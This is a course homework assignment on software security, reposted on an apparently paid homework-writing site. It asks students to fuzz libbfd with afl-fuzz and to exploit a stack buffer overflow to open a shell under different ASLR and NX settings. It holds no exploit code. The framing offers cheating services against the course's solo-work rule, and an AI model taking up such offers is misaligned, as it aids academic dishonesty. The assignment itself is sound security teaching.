Software Security代做、代写Java/c++设计、代做VirtualBox、代写CS/python编程语言

日期：2018-11-22 10:16

Software Security

Homework #4

Due: 1pm on 12/5/2018

Please read this whole assignment before starting.

In this homework you will search for vulnerabilities in new binaries and exploit one using the methods discussed in class. You will also fuzz a real library used by many software packages.

Fuzzing Instructions

●Pick up where you left off in exploring-fuzzing-notes. Gates 5-7 were the setup that is necessary to start fuzzing something that is nontrivial. In this case, you will fuzz libbfd, which is a real library for working with binaries. The readelf and objdump utilities we have used in this class depend on libbfd.

○Even though I had this installed from the exercise, I personally had to start it from scratch to get it to work. You should keep this option in mind.

●Run your fuzzer with the command

afl-fuzz -i testcases -o findings ./bfd @@

If you need more detail, there is a set of supplementary instructions for the fuzzing portion. Additionally, you should be aware that these instructions detail a method of fuzzing where you can run multiple instances of the fuzzer at once. It is slightly more complicated, but much more efficient and highly recommended.

●You do not have to explain the precise cause of the vulnerability, but you should explain how you would go about pinpointing the vulnerability (what tools/methods you would use, etc).

●What kind of damage (if any) do you think could be done with the vulnerability / vulnerabilities that you've found?

●Include a screenshot of your afl-fuzz window after you have terminated its execution.

●Take one of the crash inputs, and use it to crash the bfd program on its own. Include a screenshot or output of you completing this task.

It is possible that you will need to run the fuzzer for many hours. It is also possible that it could find a unique crash in the first five minutes. I would recommend letting it run in the background while you are working on something else, and checking the fuzzer’s output once you are done. If this is not sufficient, you can prevent your computer from sleeping and let it fuzz overnight.

Exploit Instructions

●Download the file hw4.zip from Google Drive into your CSE 523 Ubuntu VM. You can decompress its contents with this command: unzip hw4.zip

●Part 1. Which of the three programs in the package exhibit a stack buffer overflow vulnerability? Provide an explanation for the answer you give for each program, and include any information or material that would be required for me to reproduce your answer.

●Part 2. At least one of the three programs will have a stack buffer overflow vulnerability. Exploit that vulnerability by opening a shell in four different  ways:

1.With ASLR and NX off, by executing shellcode on the stack, and

2.with ASLR on and NX off, by executing shellcode on the stack, and

3.with ASLR off and NX on, using return-to-libc, and

4.with ASLR and NX on, using return-to-libc and a string built by your payload.

For each case, you should exploit the vulnerability in the way that we learned in class for that particular configuration. You should NOT use the same exploit for any two of the four cases.

For each case, provide all of the materials needed to reproduce your exploit, and include a transcript that demonstrates each one being used successfully. You are welcome to use the shellcode and payload patterns from class, along with any other course materials you find helpful.

For your write-up and turn-in document, make a copy of this document, rename it to hw4-notes, and move it into your CSE 523 Google Docs collection. Use this document to complete the homework, using the space provided below.

You are to complete this homework on your own. Do not ask (or answer) questions of other students; do not discuss any aspect of this homework with any other student. Direct all questions to the TA or me.

Please make use of Piazza for questions. If you have a question about the nature of the assignment, please ask that publicly on Piazza. If your question references your solution then you should ask that question privately.

With all the exercises we have done in class you have all the background you need to complete this assignment. If you have questions your first step should be to review the exercises you have already done. We have been building up to this final HW assignment all semester and this is a chance for you to show what you have learned and solve it on your own.

Your complete homework should include the following.

●Your explanations and transcripts should be clear and easy for someone to reproduce; you can assume that a reader has the same VirtualBox setup that you do.

●You should answer any questions posed in the sections above.

●You should include a screenshot of your fuzzer output once you have stopped its execution.

●You should run an input on the harness program that crashes it, and include evidence that it crashed the program successfully.

●You should show the execution of your shellcode and evidence that it worked as intended.

●Your write-up should be organized and well-written, with proper grammar and spelling.

Do not change anything above this line. Add your homework write-up below it.